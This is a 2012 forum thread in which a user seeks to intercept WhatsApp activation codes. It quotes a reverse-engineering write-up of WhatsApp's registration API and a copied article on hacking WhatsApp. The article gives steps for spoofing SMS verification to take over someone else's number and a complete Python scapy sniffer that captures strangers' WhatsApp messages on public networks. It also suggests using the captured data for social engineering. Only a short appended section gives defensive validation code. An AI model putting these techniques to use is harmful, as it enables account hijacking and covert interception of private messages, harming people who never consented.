lmfao Posted February 19, 2012

So I have heard that WhatsApp is not encrypted (it's an app like Viber) and that when you sign up for a number the code is generated within your phone, sent to WhatsApp's servers and then sent to you. Because it is not encrypted you can intercept it from your phone. I have been trying to figure it out for days and saw many links; does anyone have any advice? Here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox, not sent, but that won't work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school. I used the Symbian S40 client and decompiled the .jar you can find via Google to look a little bit into it. I'm not a programmer but had done some "Hello World" stuff in Java before, so I tried to understand a little bit of what is going on in the client. (In the following work I always pretended to be a Nokia C3-00, just so you know when it appears, i.e. in the User-Agent.) I don't know if it's helpful for you but I will try to share the things I found out by looking into the code, even though I can't guarantee they are right:

The first thing is the login name and the password needed to login. Matching reports from some other threads here and in other forums, the login name I found was some sort of:

Code: international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net

For example, if you live in Germany and have the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for Germany without the 0's and the phone number without the 0. The password is set during the registration process, but usually it is a transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this).
I must admit I don't exactly know how this transformation works, but I have the code that does it. I just wrapped it _very dirty_ in a standalone Java program to test it. Source: http://pastebin.com/npbwcj1s. I really don't know what it exactly does and didn't look deeper into it, but it isn't a "real" MD5 I think... (Maybe someone who knows how to create an MD5 in Java can look at what is different, except the reverse of the IMEI?)

The second thing I searched for is the registration process. With this I got so far that I got a registration code and I also get the response from the server that the account exists, but I can't login because I hadn't enough time to look exactly at the login process. Just logging in via XAMPP in Pidgin doesn't work as expected.

The registration process works this way: (no guarantee that it is right, and don't try it with your "real" number. I tried it with an old SIM I had lying around.)

0) All these API requests are done with a User-Agent like:

Code: WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00

The code generating this is: http://pastebin.com/K79wrfnS. I used information I found on the web to fill in the information for the Nokia C3-00. As said for the password: I don't think you really have to fake it to look like this, but it maybe makes it harder to find you.

1) The first step is requesting the registration code from the server (the code you get, e.g., via SMS). The API call looks like this:

Code: https://r.whatsapp.net/v1/code.php?cc=49&in=17612345&to=4917612345&lc=DE&lg=de&mcc=000&mnc=000&imsi=00000000000000&method=sms

The arguments are as follows:
cc = area code without 0's
in = number without the first 0
to = number where the SMS or call should go to (maybe security weakness?)
lc/lg = language code (?) split up, e.g.
DE_de goes to lc=DE&lg=de; US_en would be lc=US&lg=en
mcc/mnc/imsi = should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number" -> I don't know how to get to them, and the app has as "fallback" just the 0's in it when the system request for them fails, so it should work with the 0's (and it does).

The method is maybe the most interesting thing. There are 3 methods: self, sms and voice. When choosing sms you get the code via SMS as you may know it; choosing voice you get a call at the to-number where it reads the code (I didn't test, but it would match information you find at some other places on the web). I don't know what self exactly does and I didn't really look for it, because the SMS way seemed the best for me, especially because I just wanted to know my code :>

The answer after calling the API is an XML saying:

Code: <code><response status="sucess-sent" result="30"></code>

What error messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with a specific error; it just closes the app when an error occurs, if I'm right) ^^ Also you should get an SMS (in case you used the method sms) at the "to" number containing the WhatsApp code, which looks like this:

Code: WhatsApp code abc

abc is the necessary code.

2) With the given code you can then register your WhatsApp account. API call:

Code: https://r.whatsapp.net/v1/register.php?cc=49&in=17612345&udid=asdf&code=abc

cc/in = the same as in code.php
udid = the calculated password as explained in the login data
code = the just received WhatsApp code

The XML response looks like:

Code: <register> <response status="ok" login="4917612345" result="new" /> </register>

The login value is your login name for the connection and is built as explained. I think that there are error messages when the account already exists etc.,
but as said: I didn't have more time and it worked ^^

3) As a third API call you can check if an account exists. This isn't necessary for registration I think. API call:

Code: https://r.whatsapp.net/v1/exist.php?cc=49&in=17612345&udid=asdf

Parameters are the same as above. Response when an account with this number and password exists:

Code: <exist><response status="ok" result="4917612345" /></exist>

The result again gives the login name for this account. I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given password exists. You can't check if another number has a WhatsApp account with this API call. (Or I was just too stupid to find out how to do this.)

The last thing I searched for before studying for my exams was the server connection. It basically is, as said everywhere, an XAMPP connection. At least it looks like it. I think there are some small differences between the default XAMPP and the way WhatsApp does it. But nevertheless the URL I found to which it tries to connect is:

Code: socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XAMPP it also gets a connection, but the connection gets closed by the server after sending the XML and XAMPP information. When I connected to a "default" XAMPP server, after these two "sendings" the client gets a response from the server. WhatsApp instead sends the auth directly after the features, so I think the server quits the connection because Pidgin is waiting for information and the server is also waiting for information.
The login process in the WhatsApp code looks like:

Code:
```java
out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();
```

Because WhatsApp uses a "default" XAMPP library which is just modified, and the default functions are still there, I think the default login process of XAMPP looks like:

Code:
```java
send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();
```

-> As said, after send1 and send2 (which are doing basically the same as streamStart and sendFeatures in the WhatsApp version) it waits for information instead of sending the auth. Here I stopped working on it because of the exams. I think it should not be too difficult to make a login work when completely re-writing the original functions. Just as orientation, the whole (sub)class of the WhatsApp login: http://pastebin.com/X8gv2XRU

That's all I did up to now (or more exactly, before my exams). I would really like to see somebody working on this and making it work on the N900.
At first I wanted to look at it again after the exams, but even though I finished my exams two weeks ago I didn't find the time to work on this, and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all. If some beta testers are wanted for the program I would really like to test it from a hobby-programmer or more non-programmer point of view.

PS: Even though I personally don't like it when people ask for forgiveness for their bad English, I would like to do the same right now. I'm from Germany and not really good in languages. I really hope my text is readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say)

and then I found this:

How to hack WhatsApp Messenger on Nokia, iPhone & Android

WhatsApp is a cross-platform messaging application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in May 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text, which left accounts open for hijacking. WhatsApp finally released a security update for this problem and the system became locked down. In this article I will talk about alternative methods of hijacking WhatsApp messages and other protocols using a variety of methods.

The first hack I'm going to talk about will spoof WhatsApp and have it think you are somebody else, allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp verification servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device. WhatsApp now starts a counter where it sends a verification message to its servers.
If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode. WhatsApp now offers an alternative method of verification. Choose verify through SMS and fill in your email address. Once you click to send the SMS, click cancel to terminate the call for authorisation to the WhatsApp server.

Next we need to do some SMS spoofing. There are numerous ways of doing this for free. A quick Google search will pull up a vast amount of services which can spoof email addresses. If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification. You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I'm going to talk about is a little bit more professional. For users who can pull off MITM (Man in the Middle) attacks this is a sure way to rake in data from a public network. I came across the script at the 0x80 blog so I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so it's nice and simple to work with and edit to make it work for similar chat applications. You will also need to parse the traffic, so check this link: http://www.secdev.org/projects/scapy/ Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see.
Doing a MITM attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and whatever else you're hunting for.

Example:

```
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg
```

Code

You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
```python
#!/usr/bin/env python
# Python 2 script as posted (print statements, str.decode("string_escape")).
import os
import sys
import scapy.all
import re

Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
    print "#########################"
    print "## whatsapp sniff v0.1 ##"
    print "## firstname.lastname@example.org ##"
    print "#########################\n"

def whatsapp_parse(packet):
    global Previous_Msg
    global Previous_Filename
    global Files
    global Messages
    global Urls
    src = packet.sprintf("%IP.src%")
    dst = packet.sprintf("%IP.dst%")
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")
    # Target sending stuff (client -> server, destination port 5222)
    if dport == "5222":
        Filename = ""
        toNumber = ""
        Url = ""
        Msg = ""
        try:
            # The number is taken from a fixed digit offset of the payload
            toNumber = re.sub("\D", "", raw)
            if(toNumber[5:16].startswith("0")):
                toNumber = toNumber[6:17]
            else:
                toNumber = toNumber[5:16]
            # NOTE: the slice/.split() chains below operate on lists and
            # raise in the original as well; the bare excepts swallow that.
            try:
                Filename = raw.split("file\\xfc")[1:37]
                Url = raw.split("file\\xfc").split("\\xa5\\xfc").split("\\xfd\\x00")[1:]
            except: pass
            try:
                Msg = raw.split("\\xf8\\x02\\x16\\xfc")[4:-1].decode("string_escape")
            except: pass
        except: pass
        if(len(toNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "To : ", toNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "To : ", toNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)
    # Received messages (server -> client, source port 5222)
    if sport == "5222":
        Msg = ""
        fromNumber = ""
        Url = ""
        Filename = ""
        try:
            fromNumber = re.sub("\D", "", raw)
            if(fromNumber[5:16].startswith("0")):
                fromNumber = fromNumber[6:17]
            else:
                fromNumber = fromNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1:37]
                Url = raw.split("file\\xfc").split("\\xa5\\xfc").split("\\xfd\\x00")[1:]
            except: pass
            try:
                Msg = raw.split("\\x02\\x16\\xfc")[4:-1].decode("string_escape")
            except: pass
        except: pass
        if(len(fromNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "From : ", fromNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "From : ", fromNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

def callback(packet):
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")
    # sprintf yields '??' when the packet carries no Raw layer
    if raw != '??':
        if dport == "5222" or sport == "5222":
            whatsapp_parse(packet)

def main():
    banner()
    if(len(sys.argv) != 2):
        print "%s <interface>" % sys.argv[0]
        sys.exit(1)
    scapy.iface = sys.argv[1]
    scapy.verb = 0
    scapy.promisc = 0
    expr = "tcp port 5222"
    print "[+] Interface : ", scapy.iface
    print "[+] filter : ", expr
    scapy.all.sniff(filter=expr, prn=callback, store=0)
    print "[+] iface %s" % scapy.iface

if __name__ == "__main__":
    main()
```
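Seen from the verification backend's side, the two details the first quoted post flags (the `to` parameter of code.php naming an arbitrary delivery number, and the login name being derived from nothing but the phone number) are exactly what a registration endpoint has to validate. The following is an added example, not WhatsApp's code and not from either quoted post: it derives the login name by the rule the post describes and rejects code requests whose delivery target is not the number being registered. The function names and the `{"cc", "in", "to", "method"}` parameter dict are assumptions modelled on the code.php call quoted above.

```python
import re

# Added example, not from the quoted posts. Server-side checks for a
# verification endpoint shaped like the code.php call quoted above:
#   cc = country code, in = national number without the leading 0,
#   to = where the SMS/voice code is delivered, method = sms | voice.
# The post also lists a "self" method but does not say what it does,
# so it is deliberately not accepted here.

DOMAIN = "s.whatsapp.net"            # suffix quoted in the first post
ALLOWED_METHODS = {"sms", "voice"}

def normalize_cc(cc):
    """Strip '+' and leading zeros: '0049' / '+49' -> '49'."""
    return re.sub(r"\D", "", cc).lstrip("0")

def normalize_number(number):
    """Strip the national trunk prefix: '017612345' -> '17612345'."""
    return re.sub(r"\D", "", number).lstrip("0")

def derive_login(cc, number):
    """Login name as the post describes it: cc + number + '@' + DOMAIN."""
    return "%s%s@%s" % (normalize_cc(cc), normalize_number(number), DOMAIN)

def validate_code_request(params):
    """Return (ok, detail). A request is acceptable only when the code would
    be delivered to the very number being registered and the method is known.
    On success, detail is the login name the code would ultimately bind to."""
    cc = normalize_cc(params.get("cc", ""))
    number = normalize_number(params.get("in", ""))
    to = re.sub(r"\D", "", params.get("to", "")).lstrip("0")
    method = params.get("method", "")
    if not cc or not number:
        return False, "missing cc or in"
    if method not in ALLOWED_METHODS:
        return False, "unknown method %r" % method
    if to != cc + number:
        # The weakness the post suspects: a code for one number sent elsewhere.
        return False, "delivery target %s does not match %s" % (to, cc + number)
    return True, derive_login(cc, number)
```

A real deployment would pair this with per-number and per-client rate limiting, since the post notes that the client-supplied mcc/mnc/imsi values are all zeros and carry no assurance.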